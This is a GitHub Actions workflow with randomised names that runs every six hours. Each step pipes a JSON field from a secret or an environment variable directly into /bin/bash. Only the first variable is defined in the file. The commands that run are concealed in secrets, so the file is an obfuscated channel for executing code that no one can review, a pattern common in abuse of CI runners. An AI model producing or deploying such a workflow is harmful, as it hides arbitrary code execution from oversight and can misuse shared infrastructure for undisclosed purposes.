name: lixiangyang3456
on:
  workflow_dispatch:
  schedule:
    - cron: '53 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lixiangyang3456
        env:
          aju01: ${{ secrets.aju01 }}
        run: |
          echo $aju01 | jq -r .kn8462 | /bin/bash
          echo $tk5 | jq -r .pyq672 | /bin/bash
          echo $xz0 | jq -r .uzna89916 | /bin/bash
          echo $q33945 | jq -r .x04 | /bin/bash
          echo $sweq87 | jq -r .ka4224 | /bin/bash
          echo $bzcqd9409 | jq -r .j8330 | /bin/bash
          echo $mhh08 | jq -r .fp62461 | /bin/bash

